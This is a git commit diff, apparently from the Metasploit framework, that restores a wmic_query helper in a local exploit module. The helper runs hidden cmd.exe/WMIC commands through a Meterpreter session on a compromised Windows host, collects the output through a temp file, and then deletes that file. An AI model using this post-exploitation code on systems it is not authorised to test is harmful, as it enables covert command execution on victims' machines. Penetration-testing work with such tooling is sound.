Fix #4558 by restoring the old wmicexec
parent
2d0a26ea8b
commit
bf6975c01a
|
@ -194,4 +194,51 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_status("Cleanup Meterpreter RC File: #{clean_rc}")
|
||||
end
|
||||
|
||||
#
|
||||
# Execute a WMIC command
|
||||
#
|
||||
def wmic_query(wmic_cmd)
|
||||
tmp_out = ''
|
||||
old_timeout = session.response_timeout
|
||||
session.response_timeout = 120
|
||||
begin
|
||||
tmp = expand_path('%TEMP%')
|
||||
wmi_cfl = tmp + "\\" + sprintf('%.5d', rand(100000))
|
||||
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
|
||||
Rex.sleep(2)
|
||||
|
||||
# Making sure that wmic finishes before executing next wmic command
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes.each do |x|
|
||||
found =1
|
||||
if 'wmic.exe' == x['name'].downcase
|
||||
Rex.sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
|
||||
# Give the process time to flush the output
|
||||
Rex.sleep(2)
|
||||
|
||||
# Read the output file of the wmic commands
|
||||
wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')
|
||||
until wmi_out_file.eof?
|
||||
tmp_out << wmi_out_file.read
|
||||
end
|
||||
wmi_out_file.close
|
||||
rescue ::Exception => e
|
||||
print_error("Error running WMIC commands: #{e.class} #{e}")
|
||||
end
|
||||
# We delete the file with the wmic command output.
|
||||
c = session.sys.process.execute("cmd.exe /c del #{wmi_cfl}", nil, {'Hidden' => true})
|
||||
c.close
|
||||
tmp_out.gsub!(/[^[:print:]]/,'') #scrub out garbage
|
||||
|
||||
session.response_timeout = old_timeout
|
||||
tmp_out
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue